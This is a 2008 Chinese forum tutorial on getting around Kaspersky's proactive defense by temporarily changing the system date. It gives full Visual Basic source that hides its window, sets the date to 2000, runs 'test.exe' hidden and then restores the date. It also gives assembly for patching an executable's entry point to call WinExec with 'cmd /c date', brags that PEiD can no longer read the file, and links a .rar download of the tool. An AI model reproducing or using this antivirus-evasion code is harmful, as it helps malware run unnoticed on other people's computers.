|
|
楼主 |
发表于 2008-6-26 19:42:00
|
显示全部楼层
|阅读模式
来自 吉林省辽源市
Time攻破卡巴主动防御
By:New4
我先演示一下VB源代码的使用,
VB Code
Option Explicit
'声明 API:Sleep
Private Declare Sub Sleep Lib \"kernel32\" (ByVal dwMilliseconds As Long)
'暂时存放系统当前日期的变量
Dim darkst As String
Private Sub Form_Load()
'设置错误陷阱,防止错误而导致程序崩溃。
On Error Resume Next
'隐藏自身窗口
Form1.Visible = False
'得到系统当前日期
darkst = Date
'修改系统日期
Date = \"2000-01-01\"
'等待10秒
Sleep 10***00
'转让控制权,以便让操作系统处理其它的事件
DoEvents
'隐藏运行test.exe
Shell \"test.exe\", vbHide
'还原系统时间
Date = darkst
'退出
End
End Sub
简单吧就这样,大家也可以直接使用我的码源编译也行,要不直接用我的new4.exe
好VBS+bat,由于时间关系我就不说了,(保存类型选择所有文件) 码源我留给大家自己看吧 ,先测试一下效果吧
看时间变了 卡巴主动防御关闭了,程序也运行成功了 (日期)时间也还原了。 由于Ollydbg 会被卡巴主动防御拦截我先关闭实时监控了
下面我说说ASM汇编添加 修改时间命令
ASM:
push 004****1180
Call WinExec
JMP 入口
改时间命令
Cmd /c date 2001-01-01 ASCII 码写入
新程序入口点:00***16C-40***00=116C
基址
PEID打开出现那样的错误是卡巴监控被打开过导致的
“不是有效的PE文件”哈哈修改成功了PEID连入口点都找不到!!!!
我们测试看看吧,有效果了吧!
好教程就到这里 88
点击下载:http://bbs.hksxs.cn/fb/6/7.rar |
|
已绑定手机
发表于 2008-7-24 12:30:27